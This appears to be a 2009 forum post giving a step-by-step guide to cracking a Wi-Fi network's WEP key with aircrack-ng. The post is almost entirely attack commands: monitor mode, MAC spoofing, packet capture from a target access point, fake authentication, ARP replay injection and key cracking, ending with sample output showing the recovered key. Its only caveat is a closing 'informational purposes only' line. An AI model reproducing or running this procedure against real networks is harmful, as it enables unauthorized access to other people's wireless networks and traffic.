Aircrack-NG (Step by Step)
[[ Cracking Wep with Aircrack ]]
Posted Tue, 03/17/2009 - 12:00 by Anonymous
Below is a step by step guide that I have made several tweaks to for ultimate speed cracking for WEP
Enabling Monitor Mode on your Wireless Card
airmon-ng start wifi0
Bringing down the interface to change the mac address
ifconfig ath0 down
Utilizing macchanger to change the mac address to random value
macchanger -m 00:11:22:33:44:55 ath0
Bringing your wireless interface back online
ifconfig ath0 up
Utilizing Airodump to dump received packets from channel 2 to IVS file. BSSID is the mac address from the access point
airodump-ng -c 2 -w nsa.gov.ivs --bssid 00:00:00:00:00:00 ath0
Using Aireplay to create a successful authentication.
aireplay-ng -1 6000 -a 00:00:00:00:00:00 -h 00:11:22:33:44:55 ath0
Utilizing Airplay to inject arp packets back into the network
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55 ath0
Running Aircrack to test keys against capture
sudo aircrack-ng nsa.gov.ivs-01.cap
The end result will look like this. If your lucky and depending on the key length you can do it with as any as 5,000 IVs
[00:00:00] Tested 5 keys (got 25085 IVs)
KB depth byte(vote)
0 1/ 2 D4(32256) 43(30976) 62(30976) 03(30720) 32(30464) 78(30464) 1B(29696)
1 0/ 1 9F(35584) AA(33536) 62(32768) C5(32512) 45(32256) 57(31744) F8(31488)
2 0/ 1 8C(35584) 24(30720) 18(29952) 88(29952) 06(29696) 8D(29696) CD(29696)
3 0/ 2 18(31232) 44(30976) 6C(30720) B8(30720) 25(30464) 61(30464) 8A(30208)
4 0/ 1 4B(34560) AB(32256) 40(30976) 80(30720) B5(30720) C9(30464) 89(30208)
KEY FOUND! [ D4:9F:8C:45:4B ]
Decrypted correctly: 100%
This is for informational purposes only!!